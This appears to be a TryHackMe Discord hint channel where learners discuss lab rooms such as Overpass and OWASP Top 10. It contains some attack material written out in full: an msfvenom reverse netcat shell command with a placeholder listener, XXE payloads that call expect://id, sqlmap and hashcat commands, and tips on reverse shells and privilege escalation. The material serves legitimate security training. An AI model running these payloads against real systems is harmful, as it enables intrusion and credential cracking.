#room-hints
any hint about Jeff's room !!
Thanks @white salmon
Anybody willing to give hints for overpass? Got user but am lost looking for root.
Can anyone give me a hint on Overpass ?
Um can anyone tell me why priv esc is not working on Overpass
I don't want to spoil anything, so that's why
You can ask help with spoiler tags, it's not an issue
Splunk room. "When viewing search results, it's often useful to rename fields using user-provided tables of values. What command do we include within a search to do this?" Surely it's ||rename||?
@radiant dew The answer to this question is the last one I'm missing from completing the room. Can anyone give a hint what the correct answer could be?
@vernal goblet what do you want?
@stoic jewel sure, ask
@keen willow
I found the admin page. Tried some SQLi techniques, didn't work. I need a hint to go forward
you should check more on admin page. you may want to use ||browser's developer's network tab||.
I did check that. It's using api that I know
||I did point my IP to curl but I do not seem to get a rev shell, maybe I'm running the python server in the wrong dir?||
@vernal goblet you need to get more info on how it is working.
@edgy gorge copy the request and test it locally.
||curl localhost ?||
yup, on your attacker machine, where you started the python server and want to check if you have the correct setup for the reverse shell.
@white salmon I ended up looking through the Splunk docs for all six-letter commands and guessing a few. I kinda get what the question was going for, but I don't feel it's very well worded. Think about what command you would need to use if you wanted to access DATA from another table or a csv.
@radiant dew I'm also thinking about this brute force approach.
@radiant dew Thanks for the hint! I found it. I also think this question as well as some others are not very well-worded.
I'm still really happy they have a Splunk room and I would love more Blue Team rooms hint hint THM crew
I'm preparing a write-up for the Splunk room. Maybe it will be helpful for future visitors.
@white salmon #thm-community-media
We don't post answers/writeups in this channel; it defeats the purpose
@oblique cliff Sorry, I removed the URL.
Thanks
hey guys, I'm at the Linux room at task 43 - the true ending. I just need to get into the /root/root directory, and to do that I gotta have sudo permissions, but unfortunately none of the shiba users has it. What can I do?
@umbral tree same as me. Even after checking on all users I still didn't figure out what to do... I found the user with sudo permissions but don't know what to do with this.
@steep shard What is the user with sudo permission?
@rare zenith the user is nootnoot
@steep shard Yeah I found that too from a screenshot in a previous task but I can't login there.
I didn't even log into it. I just changed the directory to his home folder
That doesn't change anything
maybe we're just tired, the room creator said the solution was in the room
In the sudo task it advised us to check the man page of sudo.
I'll probably check something from there
thanks for the advice
@steep shard @rare zenith y'all are on the right track if you've found that!
I'd recommend now looking at the files each of the users own and see if you find any out of place
Ok I'll check it out thx
thank you @oblique cliff !
Hi there, any one doing/done https://tryhackme.com/room/owasptop10 ??
Just ask your question
Ok, here goes: [Task 8] [Day 2] Broken Authentication Practical. Wondering how it is allowing " darren" to be registered? Is it because white spaces are not removed before inserting?
still stuck on Overpass. Found ||/admin||. Tried to use sqlmap and Burp Suite to send an XML payload but neither was successful. I know I need to use an OWASP vuln, but totally stuck
@rotund skiff you passed the OWASP Top 10; I have a question about the task XML External Entity - Exploiting
@formal pier ask away
did you pass task 17
yes, take the XXE payload from the previous task and modify that code
Anyone help with overpass ?
how far along overpass are you?
ahh ok yeah i'm stuck at the beginning too haha
run gobuster if you haven't already
@rotund skiff look at what else is on that page
Hey, I have a problem and since it's too long, (exceeds 2000 characters) discord won't accept it. Here's the link to the pastebin https://pastebin.com/kfvXZG9p
Yes
@white salmon hashcat ran just fine, look closely
@rotund skiff Yes, but isn't it supposed to use my GPU instead of my CPU (my GPU is pretty decent and I'd like it to use it).
Plus, it says `Status...........: Cracked` but I can't seem to find the password anywhere :c
In the OWASP room - there's this question: ||How can we specify XML version and encoding in XML document?|| - I thought it was: ||xml version|| but it isn't accepted. Am I missing the obvious?
look close
@white salmon you got your pass
Damn it x)
I'm not sure about how to use the GPU, but the password is there, they just don't make it obvious. Look for where the original hash is displayed and you will see it
I thought this meant the difficulty
@hasty gust read the material provided
i would ask about the gpu problem though
Thanks!
@indigo ridge I did. I'll read again. Must have missed something
yep
I mean it isn't necessary atm soo
When I can add blog room walkthrough
go and add..btw there are already a lot of writeups
@vapid zenith
oo I don't check that okk bro I will add it
@rotund skiff any progress bro ?
inspect the admin page, there is something there. not sure what to do with it though
https://pastebin.com/A3xEymnt
Well, well, well... what went wrong this time?
rengo which one are you on
Crack the hash, Task#2
are you providing a wordlist?
Nope, just the hash and the number of characters: ?a?a?a?a?a?a?a?a?a?a?a
https://embeddedworld.home.blog/2019/05/11/hacking-walk-through-cracking-the-hashes/
@rotund skiff Alright, this'll help
where is the metasploit payload stored?
@white salmon that writeup also tells you how to specify your gpu over cpu
@random thunder be more specific please
What Room? (Link, Room title, room code from URL)
What Task? (Give the number!)
What question? (Number, maybe also basic details)
What have you tried?
What happened?
What didn't happen?
What did you expect to happen?
A picture paints a thousand words. Don't type a thousand words. Screenshots are awesome. Photos of your screen are not.
(If you want to paint a picture, we'll be impressed but a screenshot is really better)
Is there a specific location where the payload is stored when I run `msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R`?
@rotund skiff I tried using my GPU but it seems like it doesn't detect it:
```
root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/Desktop/worldlist/rockyou.txt
hashcat (v6.0.0) starting...
No devices found/left.
Started: Sat Jul 18 15:03:42 2020
Stopped: Sat Jul 18 15:03:42 2020
root@kalinux:/home/idir#
```
are you in a vm?
@white salmon Try --force
@merry helm Like hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir --force?
@white salmon Yes
/home/dir/<wordlist> --force
Help with overpass anyone ?
One thing l noticed is that ||username and password are in clear text||
Is it of any avail ?
@merry helm
```
root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir --force
hashcat (v6.0.0) starting...
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
No devices found/left.
Started: Sat Jul 18 15:12:04 2020
Stopped: Sat Jul 18 15:12:04 2020
root@kalinux:/home/idir#
```
Still :/
@shut pollen No. To get in, you need to find something in the dev console, specifically the network tab
or Application
@white salmon Missed comparison wordlist
hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/<wordlist> --force
The rockyou wordlist can be found at /usr/share/wordlists/rockyou.txt; make sure you unzip it first
@fast swan thanks for the hint but I still don't get it
haha yeah me neither
```
root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/Desktop/worldlist/rockyou.txt --force
hashcat (v6.0.0) starting...
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
No devices found/left.
Started: Sat Jul 18 15:17:48 2020
Stopped: Sat Jul 18 15:17:48 2020
root@kalinux:/home/idir#
```
Even with the right path!...
@rotund skiff Ok I'll try this
@shut pollen I can't really say much more without giving it away
You'll kick yourself when you get it
@white salmon Doesn't work, there's no wordlist folder in /usr/share/
strange, that comes default on kali
@white salmon try wordlistS
@white salmon Omit -D
do what waldir said, just run on cpu for now
@merry helm It works without -D
I just would like it to work with my GPU, it can be useful for some cracks
It just worked on cpu
go to #site-support and ask about the gpu
what command gives this result?
What do you mean
what command gets me this result?
no clue, can you show us what you did
Seems like output from MOTD file
yeah looks like a welcome message you will get when you connect via ssh or something
this is the question and after running the script that's the result and i have no clue which commands can get that
@fast swan mind if i dm?
@random thunder Room
@final mortar https://tryhackme.com/room/commonlinuxprivesc
@rotund skiff Sure!
Can't you just tell all the info in one message? Am I supposed to guess which task? https://i.imgur.com/cdSM9vE.png
task9 -> #2 * Sorry
You have to go to user5's home directory where there is a file called script as the question says
run that file and based on the output determine what command was executed
you can easily tell when you see it
shit sorry* got it now. I thought I ran it and got the welcome message and got stuck
PG-13 plz
I'm just gonna leave this here !rule1
!rule 1
Rule 1: No unsolicited direct messages (DMs) to other members of the discord. This includes staff. Verify that the member you are messaging is ok with you sending them DMs. The only exception to this rule is if a situation warrants the involvement of a moderator in order to handle something such as harassment or a situation where another member of the discord has made you feel uncomfortable.
@fast swan This is the reason he asked for your permission first. You can just decline it's not that much of an issue, but you can't quote rule 1 I think, not just yet
@final mortar I've had multiple haha
some people see someone accept the request and think it applies to all dms
@fast swan thanks for the hints on Overpass, I was way overthinking it!
@tropic flame No problems! I was as well last night. Completely overlooked it myself
hello guys, doing Vulnversity task 4: the Burp Suite brute force for file extensions is not working: .php, .phtml, .php3, .php4, .php5
i tried all
Burp Response is Extension not allowed for all
Could you show us a screenshot of your Burpsuite intruder window?
And an example request
Show me a screenshot of the Request
any request works- as long as it's one of your intruder ones
Hmm
I'm sort of frustrated with the Learn Linux last task "The flag".. I sort of looked almost everywhere, I used the find and grep commands.. to no avail. I'm at the point that I don't really know what to look for. Tried looking for files that are sort of strange.
Oops myb
@trim haven yes it is.
Have you been looking for files which are owned by specific users, which are also strange
@pseudo hamlet Try re-intercepting a file request again, and re-do the intruder setup
hmmmm I did lots of things.. I'm at the point I forgot what I did.
If you could detail any commands you used and send them in spoiler text, I can nudge you to getting the correct command
I've seen payload encoding mess with it before. If it's on, turn it off and vice versa @pseudo hamlet
Oh right, I forgot about that too
I did use ||find||, ||grep||, ||ls|| and ||ls -al|| a lot
You can tell if encoding is on by looking at the Request of one of your attacks
No the commands, || find / [flag] [flag] [flag] ||
@valid rune The task already says where the flag is, you have to look for a way to escalate
It does not
There's one flag on this machine and it's in /root/root.txt
You have to priv esc to get to it
It's a really easy way btw, just google a little
And I'm helping Crowsy find out what they need to do to priv esc.
by ||[flag]|| did you mean the command ||flag|| or the answer which is the ||flag||?
By flag I mean, you can't just type find and expect it to do things, you have to give the command some flags etc. to make it look specifically.
I also never used Google for this.. I'm trying to find out through the write-ups and the in-terminal manuals.
Use google for command documentation and examples too
You can easily find out through write-ups so if you're really using write-ups you're not trying hard enough
In Overpass, I ||understood how the API works|| and what it does, but I don't understand how to go further
Jabba, if you learn something from the write-up then you're fine
I did use ||find /* | grep||
Don't do that
Find can do all the filtering you need
Don't pipe find to grep
You want to look for files belonging to each user, one by one
You may want to re-read the find section and or google
There's a flag for find to check the owner
@wraith tapir you don't have a username or password. You want to get in. It's not SQLi. Keep working through the Top 10 that's been covered so far
Aight i think that will do thanks
done Ty
hmmmm will try that again .. thanks guys.
I did go through the find task extensively.. but I guess I'm missing something
There's a whole room dedicated to the find command
You're not locked in to that
You can take a break, do some rooms to build up your skills, and come back
need help overpass room
Help or a hint?
well I guess I'm going to do that. Just going to try it this hour and if I can't.. I'll go to other rooms to build up my skill. But this is pretty very useful. I feel like I can use Linux finally. I have tried soo many times in the past, I just couldn't.

hint, I'm stuck on getting started
It's totally ok spending a lot of time and being stuck
@valid rune
found some ||/api|| but the response is a ||404 page||
It's part of infosec
@sick sun you're going to have to go learn about APIs then.
@bronze ivy usually in these cases I give up.. but this time I feel like it's a challenge and I need to solve it.
@stuck fractal so I'm on the wrong path?
ok, I will learn again
need a hint/sanity check on overpass. I'm looking at something, but I don't know if I'm in a deep rabbit hole
I didn't build any real rabbit holes in, so chances are it's either one you've dug yourself or it's the right way
I'm stuck for some time in Overpass, I'll go back a few steps in learning, do not know how to proceed ...
maybe I need to take a break on Overpass. I'm tunnel-visioned. Values won't change just by staring at them, I guess
can help with overpass as far as user.. Still working it haha
hints tho, can't tell you how
Also any hints for root priv esc please pm me
@odd panther How much enumeration have you done?
Because you should find something pretty quick
about 5 hours now...
Try some enum scripts
I'm still not close haha, normally not an issue with Linux priv esc, I am just lost on this one, I am obviously missing it totally and I bet it's staring me in the face. I will do more tho, I would assume a SUID trick
My issue is this is the first box I've not had the user's password for things like sudo -l, so it's throwing me off until I know more.
also thanks for the box too @stuck fractal, it's very good
It's not suid but you can get the user password
I won't tell you how, but once you've got a shell it's not that hard
oh? Ok, I will work on that first then, thanks
@odd panther Do you mind going private and giving me a light?
na that's great, I did not think I could, thank you.
Has something happened to the box? yesterday it was great, today can't even get ssh login (works but VERY slow) still waiting on the login...
was lightning last night
It's a little slower if you're not a subscriber
@stuck fractal others including me are having issues with overpass, dk why it is laggy af and after 4-5 mins the box stops responding
It's ok, changing VM also to test
Literally just answered that
be a subscriber
Problem solved
@odd panther wat
changing vm = Virtual machines.
Because I have no idea what you meant by that statement
i see
Please don't dump answers
Room, task, question
Screenshots not phone pictures
Don't take a photograph of your screen. Take a screenshot.
some nudge on that ||api|| thing in overpass
Why do people take phone pics, I don't understand
check what the API is doing and follow along the code
cos I can't log on to Discord on da laptop
cos it's my cousin's
room rpburpsuite
task 7
q6
@indigo ridge got foothold?
no
api is nothing
Woah what
Read the API files to see what it's doing
@odd panther ...you can't
The API is serverside
You can look at the JS
sorry the .js
That's done, making arbitrary req
to the API
Numerous req, nothing seems to work, don't know what I'm overlooking
same here
When you find it you will kick yourself too

Its one of the owasp top 10 that have been covered
@white salmon I think it is IDOR
Try 'em, see, you'll get it, it's one of 'em
there is no param for IDOR
So if I sub, this box will instantly start to respond? Still VERY slow rn
(maybe too many on it free)
It's not like too many tho, but your IP got less resources so it doesn't work properly sometimes
subbing would do it faster
Much more resources
oh I see, yes it's like it now. I may just sub then, was going to anyway
waiting is no fun xD
only a few on the box "376 users are in here"
That's not how boxes here work @odd panther
It's not like HTB
Oh single instance each?
yeah
ok nice, thanks.
@odd panther you can decrypt the RSA key with openssl so you won't have to wait for the "Enter the passphrase" thing
i have the pass, but it still asks.
Yeah it will
(unless i did something wrong, ssh2john used)
You have to decrypt the key before you can use it
yea
You still need to use that passphrase
yeah
yeah i was
With overpass privesc, do I need to pivot to a different user to gain root or is there an easier way?
just the box is slow: enter key, wait, login.... and wait... and wait... lol
@odd panther Stop complaining. I've asked skidy to add more resources. Your choice is either wait, or put up with it.
Oh I'm ever so sorry for bringing up an issue, I thought this was a place of help.. My bad...
jesus
You know, it is
But there's nothing that can be done RN
So you're just whining about the same issue that is being fixed
Right well no need to be a martyr buddy.. I asked a question for help..
@odd panther Yo man just tell me, I'll give you the flags
ok, As you say buddy
Not your buddy
ok pal
Not your pal.
ok love
Stop.
literally stopped lol
@indigo ridge There is no reason for your comment, a mod has already told them to stop
sorry
ok not trying to moan here, but what is the best solution for this situation?
Use a correct username.
it keeps resetting, anyone else getting this too? Or am I the special one
redeploy
it was telling me that before.. ok (and let me in) maybe why I'm confused and "moaning" as you put it.
No, you were complaining about the box speed
Which is being addressed
So you should be happy about that
Should I now, ok great thank you
Permission denied (publickey) how does one go about fixing this error?
while trying to ssh into a machine
Use a public key
if you only have private?
how would i resolve that
is there a way to generate a public via a private?
I'll try later for this, do you know when it may be back to speed at all @stuck fractal Or is it a more first come first serve basis here? thanks.
@worthy iris ssh -i /path/to/key <user>@<host>
@odd panther Once Skidy(one of the admins) comes online he will bump up the resources
Oh I see, ok thank you for the help. @tidal sedge
I do that, that's how I get the error, I only have a private rsa key
What are the permissions on the key?
700
There is no reason for it to have u+x so, I'd set it to 600
so just having the private key alone isn't enough I take it
it should be, chmod 600 key then try to use it
same results
Where is this from (what box?)
Guys need help in Vulnversity privesc
need some help at the Overpass room, can someone gimme a hint please
It helps when you actually say what you're struggling with
the login page, don't know what to do exactly
I'm just going to go ahead and assume you probably need to enumerate more
@fathom jolt What on the page do you see using Dev tools? (f12) look about
guys systemctl privesc help
@pseudo hamlet have you googled anything about that?
@pseudo hamlet https://gtfobins.github.io/
I thank Skidy for sure, your attitude while dealing with this was more than subpar sorry to say, so much so I don't even want to sub now due to you. but THANKS...
You're Welcome..
I'm going to assume that was a joke lol
Eh, they do nothing but complain about things that are being fixed
I came here for help tbh not to be chastised for a slow box i knew nothing of. Also I was asking, i never got an answer apart from some smart replies..
But still no issues, I do thank you for asking for the box to be updated. Just was not overly happy with how you spoke to me, I'll put it down to tiredness from you, I'm sure you're not this obtuse usually
I'll be honest, I really love thm.
I'm sure you don't complain this much about things that I'm actively trying to get fixed normally
but today you made me feel like I don't want to come for help lol
it should not be like that, you're a mod to help man..
Ok I can see you're still the same, James. Have a good day brother
Nah, just read up.. I disagree with ya there entirely
You may disagree with me, we can't all agree.
Anyway, off-topic for channel - convo dead
This was how I felt and you're quite right, it's enough. Get cracking that box!!! (those who have not already)
I just went through wonderland
@odd panther did it but didn't find anything
Where are you looking? Like see... how is the page loaded. What's being loaded, scripts etc, this is a good start on any box
Also I'll be honest, I'm a noob too, been at this 35 days now lol so a lot to learn (why I ask here)
I did and found that the passwords are encrypted in ||rot47|| but don't know where ||the file with encrypted passwords|| is..
Help with initial foothold in overpass... I know something is in l****.js but what... Idk... Some hints needed
Read the .js files, learn how it works. (it's all we can really say at this stage)
It's the f**** function... I'm not understanding
|| authentication is broken ||
I don't think I can say more, it's up to the mods here to help more, I feel if I give more it's too much
I'm in OWASP Top 10 today's task (day 6 - task 20) and I googled about Pensive Notes but I'm unable to find the documentation
Anyone got anything?
day 6
Thanks changed it
Working now, wish the customers would hurry up so I can get back to the boxes xD
yeah, the web app is running Pensive Notes which might have default creds, but no luck trying admin - admin; the hint says look at the documentation but no luck finding it
What is the first question of the hint ?
app source code
No idea
OWASP day 6, app source code... any hints for that?
Stuck on the same
What's a common website used to share source code for open source projects?
Google doesn't index everything
Hi, does anyone know how to replace firstName also with an ENTITY??
<!DOCTYPE replace [<!ENTITY name "Test"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>
Also, I want to run other system commands like id, ls, ps but they are not working on https://tryhackme.com/room/owasptop10
Used this but no result:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<root>
<name>&xxe;</name>
</root>
Doesn't that assume expect is enabled?
Wrong chat
ok, into the site. Again, read the code lol
ok so expect is not enabled then, but if it were, this should work? Another example:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'expect://id'>]>
<root>&read;</root>
@stuck fractal Well played
Try not to spoil it
This was damnnnn dirtyyyyy
@stuck fractal that spoiled the fun for me, I finally got it
lol I didn't read the readme and got straight to the database and tried to crack that PW with rockyou - without success
@white salmon
I was going to do the same
Therefore reminder: RTFM!
I am suspecting... if the same solution is for the Overpass initial foothold
Nope.
Anyone getting anything from the source code of the webapp for day 6??
@stuck fractal
I can't even find it on there, need better google fu
Oh god you really know how to mess me up James haha
Don't use google
@stuck fractal
That's a first
@stuck fractal I used developer options to see the HTML code but I'm not getting anything in it
You're looking for serverside information by viewing client-side code?
The fact that you actually know the count is impressive enough
oh so we can enum? I've only been using the dev tools lol
Do what you want with the VM and webapp, but there's an intended solution
I would rather go intended, I'm here to learn, if not very slowly. I mean it's intended for a reason so I should aim for it
@stuck fractal well I thought it was similar to the day 3 one
@odd panther Have you seen the hint I've given?
you can google open source community
no... but let me stare at your words for a while, I bet it's obv too.. thank you again
yeah i know, but i can't find this on it
Closed room, thank you to the colleague @odd panther who assisted me in the first steps.
Da man! Good job!
A good challenge, I learned new things, thank you @stuck fractal
I am doing the Blue Primer Networking room but I am stuck on this problem, can someone please give me a hint:
Please don't show answers
The second is similar to the first
ok thank you. (I've not done any enum, thought it was not ok for this one, doing now)
Is it a bad habit if I always use a pipe and grep after find to find certain files? (because apparently I don't know how to use find properly)
Yes
find / -iname "*someSubString*" 2>/dev/null is a really useful command to understand
https://superuser.com/questions/905660/what-other-ip-addresses-can-should-i-use-for-my-home-network
@stuck fractal None of the answers/comments shown have a format of xxx.xxx.x.x that I need to answer the problem
@sinful badger Eh, I found various answers in there. And with a few google searches
@valid rune -iname is for case insensitive
@stuck fractal also sorry for my attitude earlier.
Apology accepted
aww, that's sweet
@sinful badger Have you ever set up a network for your home or business before?
I just realised how much of a hint I gave in the room text on Day 6
And a hint on the question
That's assuming people actually read the room/task text
any other hints for Overpass challenge
The answers seem to say these are the three ranges:
192.168.0.0 - 192.168.255.255
172.16.0.0 - 172.31.255.255
10.0.0.0 - 10.255.255.255
Yep
Unless the answer is 192.168.x.x
second common private home range
Ok well that's misleading but yeah
It's looking for a network
@inland onyx Could I get you to fix that on BP networking?
Okay I think I'm just dumb then
I mean it's fairly close to the first
192.168.x.x doesn't work when I put it in the answer though
Yeah, that question is kinda weird
@sinful badger Nope, because that's not how you denote a network
Typically, 192.168.x.0/24 is used, so only the last octet will change
So logically, the next one up from the answer before
192.168.x.0 does not seem to work either
You're close- stop being too broad and be more specific
I just wanted to say thanks to @odd panther and @stuck fractal for the hints in their convo about today's OWASP challenge. For such an easy one, it took me down some weird paths. Cheers!
It's asking for the second most common IP network configuration basically
@stuck fractal @white salmon Thanks, I got the answer now
Awesome!
any other hints for Overpass challenge
Glad you found it :D
@random thunder Where have you got so far?
@stuck fractal able to run the executable on my machine but unsure about the service parameter
You created your own rabbit hole
Also, don't run random binaries on your own machine
Unless you've RE'd them
Iam stuck and i have no clue where to proceed now
It's an OWASP top 10 web vuln
That's in the hints
So maybe some more web enumeration would help you out here?
@random thunder I thought that was actually a rabbit hole, I could not get any sense, but also I am bad at RE on ELF
I mean you're given the source code lol
I don't know the language haha, but you're right, I only need to learn more
It's a rabbit hole, but one that you throw yourself into
It reads like most curly brace languages
@stuck fractal here comes a new definition, lol
thought you were talking abt ||.js||, isn't that it?
fish, but that fits on that too.
here comes a new definition, lol. No idea what you mean tho
I have to learn how to make a shell in go with the ability to upload and download files.. I don't know go.. so that will be fun
reverseshell sorry
If it's for overpass, you really don't
for Mcsi training
I searched about... ||fetch function|| and the entire ||login.js|| appears to be the intended way for login... What is the loophole here
It's an OWASP top 10 web vuln that's been covered in the first 3 days
any hint for privesc on overpass?
tnx
any hints on how to access the machine to run the code? @stuck fractal
Them feels
don't @ James, anyone can help you
You're fixating on the code @random thunder
Thank you to @merry helm r and @stuck fractal for the help
Stop fixating on the code
Okay.
Flag 3 is located where bob's bash history gets stored, and Flag 4 is located where cron jobs are created. Requires privesc, right?
No
404 users Nice
@valid rune You have to find where these locations are, and then the flag.txt will be located inside of them.
Or the flag will be text inside those files
i tried with bob's bash history, but it required privs
same as crontabs .. they require privs
They don't
You're looking in the wrong area
You can view the history by typing one word
Wrong place
Hey everyone, I am stuck on Day 6 of OWASP Top 10 challenge. I have looked through the page source and found a comment ||js/cookie.js|| I tried to use ||github|| to look for the application name and also the javascript but could not find anything. I am not sure if I missed something or I overlooked it.
@plucky steppe you were looking in the right place on one of those
@white salmon hmm interesting, is the source code that the hint talks about for the ||js-cookie v3.0.0-beta.4||?
@rapid flower There's other tools you can use such as linpeas to enumerate for potential privilege escalation opportunities.
@tropic flame
Is that possible on ||overpass||
Hello everyone! Can someone give me a hint? I am stuck at security configuration from the OWASP top 10 room
@plucky steppe I cloned this repo and I did not find any default credentials
@rapid flower yes, you would have to serve up a local server and use wget to get it, but it's not needed on Overpass.
Anyone can that can help me?
@frank lagoon Could you give a little more information about what you're stuck on and what you've done already?
@crystal saffron dont really want to reveal the ans in here. Theres a massive hint slightly earlier in this chat ๐
@white salmon sure
So I tried to look at the source code, found that it looks for a cookie with a value, I changed that value and the server thought that I was a user, it sent me to /mynotes/. I tried to create a note --> didn't work.
Tried directory bruteforcing, logging in via ssh with default creds, tried default creds on the web login form @white salmon
can i dm some one about overpass?
no need for dm just send your question here
You're looking in the wrong place @frank lagoon
@cedar coral yeah
I am very lost now I am still trying to look at ||github|| but cannot find anything that seems as a security misconfiguration
The text in the OWASP room tells you exactly what the vulnerability is
Am I looking at the right place? Path: /api/note/list
Still no
fork: can't allocate memory @stuck fractal
Overpass *
I already did it
@frank lagoon So you know from the hint in the room that you need to find the source code
it will work for you
@odd panther okay thxx
Yes from cookie.js?
no
Once you have the source code credentials are in plain text
I think it is ||cookie.js|| am I right?
Pensive notes?
@white salmon use the double pipes
Thanks MrRobot
|| there is a place where people upload source code ||
Lmao
|| github? ||
I finally get it, the other place to search, I see why you said the hint about indexing now...
@odd panther does that allow to prevent indexing from web searches?
@frank lagoon I dont think its that
What's a common website used to share source code for open source projects?
I'll keep giving out this hint
Webserver hosts it?
No
Bitbucket?
@stuck fractal Literally this is all you need
@marble moat that still a thing?
Thanks @stuck fractal for the hint -- fully agreed with what you said -- it's literally the only hint that's needed...
You can even put it like this into google
I can learn from that, thank you. Its in golang!
I meant your hint/question
Common website for source code for projects
To download?
To share.
Does the domainname start with 'opensource'?
@frank lagoon You're not gonna bruteforce-ask the domain name now, are you?
Something to do with mit license?
This is pain, I want to help you so bad but can't.. hammers etc haha
you're all so close
Thanks for the hint @stuck fractal
@odd panther tried etc/shadow
|| Sourceforge? ||
/etc/shadow never works for me ( i mean not been a good priv esc as usually locked down)
I'm sure there are ways tho
Open source repo
@marble moat Seriously, try some privesc enumeration scripts
Or check the room tags and the checklist I keep linking
|| SourceRepo? ||
Can you give another hint?
A source-code repository is a file archive and web hosting facility for source code of software, documentation, web pages, and other works, accessible either publicly or privately. They are often used by open-source software projects and other multi-developer projects to maint...
James any hint on This - #room-help message
Wait for a response
Ok
https://en.wikipedia.org/wiki/Comparison_of_source-code-hosting_facilities have fun
@white salmon James just listed quite a lot
@tall rover just seen
Source code hosting? || Assembla || If that was incorrect then I will try everything on that list (little bruteforce)
I will complete it later
@frank lagoon it is most likely the first place that comes to mind when talking bout opensource projects
|| Github, gitlab, sourceforge ||
Have a look around maybe ¯\_(ツ)_/¯
Thanks, I think I got it
@frank lagoon Maybe try searching on those platforms
Google doesn't index everything
Okay I see salt values?? am I on the right track? @odd panther
I did overcomplicate it a lot.
@stuck fractal I was slightly disappointed that you properly escaped all your SQL for Pensive Notes. I was hoping to find some Easter eggs. Of course, there is a good chance there were things to find and I'm just not bright enough to find anything.
@stuck fractal yesss it was easy, guess had a lot of red herring
It's one of those tho, when searching and not knowing you try all and give up fast even when on the right track. I'm learning now to keep going even after hours of enum, you WILL get it at some point.
@toxic scarab There's nothing interesting on the DB
I just learnt with prepared statements, I don't know how to do it in a vulnerable way yet
btw google indexed it just you have to remove the space
Thanks for the help guys, finally found it. You were right James, it was easy, just overthought a lot of it.
For sure a learning moment
omg got root on overpass
Am I on the right path? I found a main.go file
You need to read the docs
It's not got a hardcoded password
Hardcoded and default are slightly different
Hardcoded cannot be changed
where are these documents
@frank lagoon not yet i guess
The internet
@sterile robin Do your research and enumeration and you will find them
what web site
@rapid flower I found it
What's a common website used to share source code for open source projects?
That's the hint
@frank lagoon you are talking about owasp or overpass?
Exactly
I didn't mean it sorry
If you look, you will find it
Ohh my bad... I misunderstood
But you have to look yourself
I know, a lot of people maybe misunderstood me and told me to look somewhere else than that platform
found it
same just, I can't believe i missed the comment "check the documentation"
I so almost pasted the key here too.. lucky lol
must have better window arrangement
Some hint for privesc on overpass... Ran ||linpeas|| but nit able to figure out next step
Pentesting = Everything is hard until you know how. I spend so many hours on a task but when I get it, ahh it's good. (usually simple too, after you know how), this sums up learning for me so far haha
i'm looking for a hint or a push in the right direction for Task 18 SQL Injection of room CC:Pen Testing
i've ran sqlmap -u "http://{ip}/?id=1" --level=5 --risk=3
but I can't seem to get any useful information, it just shows testing info, and at the end it says all tested parameters do not appear to be injectable
my first question is to answer how many sqli vulnerabilities there are, but from the output i'm getting it seems like none, lol
There's no parameter called id.
doesn't sqlmap require there to be a parameter?
ohhhhh i think i know how to get it
is it the id located in the page source?
nevermind, looks like i can just run it with --forms
You typically look at a request to find the parameter
Or see what the form is going to do
ohhh, okay, that makes sense
@odd panther hii bro can i pm you about overpass ?
the owasp challenge for today hint is to locate the app source code, I am not sure how to find out what this app is, I tried googling for 'pensive notes' and no results on github. Enumerated via dirb / nikto but no luck either. Any direction? also tried a bunch of user/pw combos but no luck.
Google without a space
But it's available quite easily
Google doesn't index everything
A website's own search feature will be better for results on that site
10-4 , that took all of 5 minutes, now taking my beginner level skills to Overpass and all the rabbits hole i have dug for myself
How can I get output file on the remote host in meterpreter ? Any idea .
That sounds like a question for google.
There's a nice meterpreter basics article out there
I recommend finding and reading it
I checked it, but I can't find...
Ok, maybe I will give it a thorough reading..
@stuck fractal searched everything... I found the command download... but my answer needs to be 3 letters. Like this, can u give me a hint?
Room wonderland, I was user rabbit, teaParty binary is owned by root. I did ||environment variable privilege escalation|| on this binary by creating a fake date binary but I got hatter as user and not root?
You can't possibly have searched everything. @ivory kernel
@white salmon time for you to learn about suid and some RE
Have you looked at the source code of the binary?
Oh I'll try
That explains why
@stuck fractal if this one is done, the whole machine is done. Just stuck here.
Or you can accept that I added a setuid(100Whatever) at the start of the program @white salmon
And that you can't get root from it
yes/no on an overpass rabbit hole I'm stuck in: is there sql injection on the admin form? cause my sqlmap is not finding any
@ivory kernel I told you to go find the meterpreter basics. It's in there. Please remember rule 13. This is very easy to find via google.
@waxen iron No, it uses prepared statements so there's no possible SQLi.
Yeah I added setuid(0). I'll read more about suid I think I need to get more clarity in it.
It's already running as a different user
You can't change that
You managed to go one user up the chain
That's a good thing. Now keep going.
thanks @stuck fractal btw - for patiently answering everyones questions here.
I made the room, so I can answer that question quickly
I also made wonderland, so that's quick to answer
I'm slowly taking over the platform and there's nothing you can do to stop me muhahaha
@stuck fractal I searched it man...
I got the answer...
One is download, and another one is spool.
But it states that a 3-letter word fits in?
Hey guys I need help with owasp top 10 room latest challenge. Can you give me any hint on security misconfiguration.
So finally rooted overpass. Thanks for the box @stuck fractal
Lol yes yes
I told you that this guide exists, and asked you to find it yourself and look at it.
Man I fully went through that document, I couldn't find the answer.
Can u pls say the answer or otherwise show the answer on that site @stuck fractal, I'm sure I didn't miss anything.
I'm stuck on that too, bro @ivory kernel
Any hint on Day 6, room owasptop10, find comment and try how fetch is working here for JSON
At least tell me, am I going wrong
@marble kiln Read the material in the room, check the hint
You're not going to be able to hack in unless you know credentials
Any hints related ||cron|| in overpass?
Work out what you can control and what you can't control
@stuck fractal reading source code for hours but couldn't see any credentials except a comment in a js file
It's not in JS
So have fun
The source code isn't the frontend code
Try harder. Do some research.
Overpass is not beginner level... Or is it?
Then I surely need to go a long way
You're expected to know privesc and enumeration
Run some privesc enumeration scripts
And it's my first... At least where things are related to ||cron||
Ok, so time for you to do some research into that
||gtfobins|| don't appear to be working over here
